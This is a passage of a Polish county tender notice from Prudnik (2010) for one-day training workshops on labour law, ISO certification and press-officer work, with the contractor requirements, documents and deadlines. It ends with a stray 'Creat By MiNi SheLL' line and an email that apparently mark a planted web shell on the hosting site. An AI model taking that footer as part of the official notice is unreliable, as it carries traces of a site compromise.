Zorganizowanie i przeprowadzenie 1 dniowego szkolenia mającego  formę warsztatów z trenerem dla  4 uczestników. 
Łączna liczba uczestników szkolenia: 4
Miejsce szkolenia: Prudnik
Celem szkolenia jest wymiana dobrych praktyk oraz konsultowanie trudności napotykanych przez uczestników  w trakcie wykonywania obowiązków służbowych.
Wykonawca zobowiązany jest do zapewnienie odpowiedniego trenera, który wygłosi krótki wykład na temat prawa pracy, oraz będzie moderował dyskusję i uczestniczył w wymianie doświadczeń i opinii wygłaszanych przez uczestników szkolenia.
Program seminarium szkoleniowego do ustalenia z Zamawiającym, odpowiednio przed spotkaniem
22.ISO - wprowadzenie i przygotowanie do certyfikacji
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia mającego  formę warsztatów z trenerem dla 4 uczestników. 
Łączna liczba uczestników szkolenia: 4
Miejsce szkolenia: Prudnik
Celem szkolenia jest  wymiana dobrych praktyk oraz konsultowanie trudności napotykanych przez uczestników  w trakcie wykonywania obowiązków służbowych.
Wykonawca zobowiązany jest do zapewnienie odpowiedniego trenera, który wygłosi krótki wykład na temat certyfikatu jakości ISO, oraz będzie moderował dyskusję i uczestniczył w wymianie doświadczeń i opinii wygłaszanych przez uczestników szkolenia.
Program seminarium szkoleniowego do ustalenia z Zamawiającym, odpowiednio przed spotkaniem.
23.Wybrane zagadnienia związane z pracą rzecznika prasowego
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia mającego  formę warsztatów z trenerem dla 4 uczestników. 
Łączna liczba uczestników szkolenia: 4
Miejsce szkolenia: Prudnik
Celem szkolenia będzie wymiana dobrych praktyk oraz konsultowanie trudności napotykanych przez uczestników  w trakcie wykonywania obowiązków służbowych
Wykonawca zobowiązany jest do zapewnienie odpowiedniego trenera, który wygłosi krótki wykład na temat pracy rzecznika prasowego, oraz będzie moderował dyskusję i uczestniczył w wymianie doświadczeń i opinii wygłaszanych przez uczestników szkolenia.
Program seminarium szkoleniowego do ustalenia z Zamawiającym, odpowiednio przed spotkaniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 55.50.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni posiadać  wpis do rejestru instytucji szkoleniowych, prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać doświadczenie polegające na wykonaniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , co najmniej jedno szkolenie o wartości nie mniejszej niż 100.000zł brutto odpowiadające przedmiotowi zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań , których spełnienie Wykonawca będzie zobowiązany wykazać .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami , które będą uczestniczyć w wykonywaniu zamówienia  legitymujące się kwalifikacjami zawodowymi , doświadczeniem i wykształceniem. Wykonawcy winni udokumentować ilość kadry dydaktycznej oraz ich  kwalifikacje odpowiadające liczbie i rodzajowi szkoleń przewidzianych do realizacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań , których spełnienie Wykonawca będzie zobowiązany wykazać .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie o wpisie do rejestru instytucji szkoleniowych, prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatprudnicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Prudniku ul. Kościuszki 76, 48-200 Prudnik pok. 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 11:00, miejsce: Starostwo Powiatowe w Prudniku ul. Kościuszki 76, 48-200 Prudnik pok. 102 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest przewidziane do finansowania ze środków: Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz z budżetu krajowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com